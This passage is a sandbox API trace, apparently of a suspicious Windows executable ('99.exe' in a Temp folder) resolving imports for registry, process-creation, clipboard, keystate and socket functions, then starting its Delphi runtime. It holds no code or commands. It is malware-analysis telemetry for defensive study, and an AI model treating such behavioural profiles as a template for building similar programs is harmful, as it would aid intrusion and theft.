lpProcName="VirtualAlloc") returned 0x769c1836 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="lstrlenA") returned 0x769c5a03 [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpynA") returned 0x769d18e2 [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpyA") returned 0x769e2a6d [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExA") returned 0x769c48cb [0260.152] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0260.153] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0260.153] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0260.153] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0260.154] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0260.155] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0260.155] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0260.155] GetProcAddress (hModule=0x773b0000, lpProcName="GetKeyboardType") returned 0x77409ac4 [0260.156] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0260.156] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0260.156] GetProcAddress (hModule=0x773b0000, lpProcName="CharNextA") returned 0x773c7a1b [0260.156] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0260.156] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0260.156] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0260.156] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0260.156] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0260.156] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0260.156] GetProcAddress (hModule=0x757f0000, lpProcName="VariantCopyInd") returned 0x7580e86c [0260.156] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae [0260.156] GetProcAddress (hModule=0x757f0000, lpProcName="SysStringLen") returned 0x757f4680 [0260.157] GetProcAddress (hModule=0x757f0000, lpProcName="SysFreeString") returned 0x757f3e59 [0260.157] GetProcAddress (hModule=0x757f0000, lpProcName="SysReAllocStringLen") returned 0x757f7810 [0260.157] GetProcAddress (hModule=0x757f0000, lpProcName="SysAllocStringLen") returned 0x757f45d2 [0260.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0260.157] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0260.157] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueExA") returned 0x76c314b3 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueA") returned 0x76c80e41 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryInfoKeyA") returned 0x76c2e143 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyExA") returned 0x76c31481 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegCreateKeyExA") returned 0x76c31469 [0260.158] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0260.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.158] GetProcAddress (hModule=0x769b0000, lpProcName="WritePrivateProfileStringA") returned 0x769e7018 [0260.158] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualUnlock") returned 0x769def11 [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualLock") returned 0x769dec0b [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPriority") returned 0x769c326b [0260.159] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileAttributesA") returned 0x769deca3 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceFrequency") returned 0x769c41a8 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0260.160] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalUnlock") returned 0x769dcfb4 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalHandle") returned 0x769ed26c [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalLock") returned 0x769dd077 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalFree") returned 0x769c5510 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GetWindowsDirectoryA") returned 0x769e2ada [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GetVolumeInformationA") returned 0x769e6d9b [0260.161] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersion") returned 0x769c441f [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadPriority") returned 0x769c4377 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempPathA") returned 0x769e273c [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempFileNameA") returned 0x769e9d0f [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetPrivateProfileStringA") returned 0x769d1804 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0260.162] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetExitCodeProcess") returned 0x769d1705 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetDriveTypeA") returned 0x769def45 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceA") returned 0x76a448df [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatA") returned 0x769ea939 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0260.163] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FormatMessageA") returned 0x769e5f8d [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToLocalFileTime") returned 0x769ce256 [0260.164] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToDosDateTime") returned 0x769dc845 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="EnumCalendarInfoA") returned 0x769e9e40 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="DeviceIoControl") returned 0x769c31df [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventA") returned 0x769c323c [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0260.165] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0260.166] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0260.166] GetModuleHandleA (lpModuleName="version.dll") returned 0x0 [0260.166] LoadLibraryA (lpLibFileName="version.dll") returned 0x74520000 [0260.169] GetProcAddress (hModule=0x74520000, lpProcName="VerQueryValueA") returned 0x74521b72 [0260.169] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoSizeA") returned 0x74521c9c [0260.169] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0260.169] GetModuleHandleA (lpModuleName="gdi32.dll") returned 0x77240000 [0260.169] GetProcAddress (hModule=0x77240000, lpProcName="SetBkMode") returned 0x772551a2 [0260.169] GetProcAddress (hModule=0x77240000, lpProcName="GetStockObject") returned 0x77254eb8 [0260.169] GetProcAddress (hModule=0x77240000, lpProcName="CreateFontA") returned 0x7725d0e8 [0260.169] GetProcAddress (hModule=0x77240000, lpProcName="CreateDIBitmap") returned 0x77257217 [0260.170] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="TranslateMessage") returned 0x773c7809 [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="ShowWindow") returned 0x773d0dfb [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowTextA") returned 0x773d7aee [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowPos") returned 0x773c8e4e [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SetFocus") returned 0x773d2175 [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SetDlgItemTextA") returned 0x773dc4d6 [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SetClipboardData") returned 0x77408e57 [0260.170] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageA") returned 0x773d612e [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="SendDlgItemMessageA") returned 0x773ec112 [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassA") returned 0x773d434b [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="PostQuitMessage") returned 0x773c9abb [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="PeekMessageA") returned 0x773d5f74 [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="OpenClipboard") returned 0x773d8ecb [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="MsgWaitForMultipleObjects") returned 0x773d0b4a [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0260.171] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="LoadIconA") returned 0x773cdafb [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="LoadCursorA") returned 0x773cdad5 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="IsClipboardFormatAvailable") returned 0x773d8676 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowTextA") returned 0x773d0029 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowRect") returned 0x773c7f34 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetSystemMetrics") returned 0x773c7d2f [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetFocus") returned 0x773d0dee [0260.172] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItemTextA") returned 0x77426b36 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItem") returned 0x773ef1ba [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="GetDesktopWindow") returned 0x773d0a19 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="GetDC") returned 0x773c72c4 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="GetAsyncKeyState") returned 0x773eeb96 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="GetActiveWindow") returned 0x773ef5c7 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="EndDialog") returned 0x773eb99c [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="EnableWindow") returned 0x773d2da4 [0260.173] GetProcAddress (hModule=0x773b0000, lpProcName="EmptyClipboard") returned 0x77427cb9 [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="DispatchMessageA") returned 0x773c7bbb [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="DialogBoxIndirectParamA") returned 0x7740ce64 [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="DestroyWindow") returned 0x773c9a55 [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0260.174] GetProcAddress (hModule=0x773b0000, lpProcName="CloseClipboard") returned 0x773d8e8d [0260.174] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000 [0260.174] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateGuid") returned 0x76ec15d5 [0260.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.175] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0260.175] GetModuleHandleA (lpModuleName="wsock32.dll") returned 0x0 [0260.175] LoadLibraryA (lpLibFileName="wsock32.dll") returned 0x6be10000 [0260.178] GetProcAddress (hModule=0x6be10000, lpProcName="ioctlsocket") returned 0x75613084 [0260.178] GetProcAddress (hModule=0x6be10000, lpProcName="WSACancelBlockingCall") returned 0x75625343 [0260.178] GetProcAddress (hModule=0x6be10000, lpProcName="WSAIsBlocking") returned 0x756253be [0260.178] GetProcAddress (hModule=0x6be10000, lpProcName="gethostbyname") returned 0x75627673 [0260.178] GetProcAddress (hModule=0x6be10000, lpProcName="send") returned 0x75616f01 [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="recv") returned 0x6be117a8 [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="connect") returned 0x75616bdd [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="WSACleanup") returned 0x75613c5f [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="closesocket") returned 0x75613918 [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="shutdown") returned 0x7561449d [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="socket") returned 0x75613eb8 [0260.179] GetProcAddress (hModule=0x6be10000, lpProcName="WSAStartup") returned 0x75613ab2 [0260.295] GetModuleFileNameA (in: hModule=0x1fb0000, lpFilename=0x18fde8, nSize=0x105 | out: lpFilename="\n" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\\n")) returned 0x0 [0260.304] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fcc3, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0260.305] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0260.305] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0260.305] lstrcpyA (in: lpString1=0x18fcc3, lpString2="\n" | out: lpString1="\n") returned="\n" [0260.305] GetThreadLocale () returned 0x409 [0260.305] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18fdd3, cchData=5 | out: lpLCData="ENU") returned 4 [0260.307] lstrlenA (lpString="\n") returned 1 [0260.315] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x312a20 [0260.322] GetKeyboardType (nTypeFlag=0) returned 4 [0260.322] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0260.322] GetStartupInfoA (in: lpStartupInfo=0x18fe78 | out: lpStartupInfo=0x18fe78*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0260.322] GetCurrentThreadId () returned 0xc84 [0260.438] LoadStringA (in: hInstance=0x1fb0000, uID=0xffdc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.438] LoadStringA (in: hInstance=0x1fb0000, uID=0xffdb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffda, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd7, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffd1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffea, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffeb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffec, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe5, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe4, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe0, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xffff, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfffe, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfffd, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfffc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfffb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfffa, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.439] LoadStringA (in: hInstance=0x1fb0000, uID=0xfff9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.447] LoadStringA (in: hInstance=0x1fb0000, uID=0xfff7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.447] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x31e720 [0260.447] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2010000 [0260.447] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x31f720 [0260.447] VirtualAlloc (lpAddress=0x2010000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2010000 [0260.448] LoadStringA (in: hInstance=0x1fb0000, uID=0xffe7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0260.455] GetThreadLocale () returned 0x409 [0260.455] GetSystemMetrics (nIndex=74) returned 0 [0260.464] GetSystemMetrics (nIndex=42) returned 0 [0260.472] GetThreadLocale () returned 0x409 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jan") returned 4 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd04, cchData=256 | out: lpLCData="January") returned 8 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Feb") returned 4 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd04, cchData=256 | out: lpLCData="February") returned 9 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mar") returned 4 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="March") returned 6 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Apr") returned 4 [0260.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="April") returned 6 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0260.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0260.473] 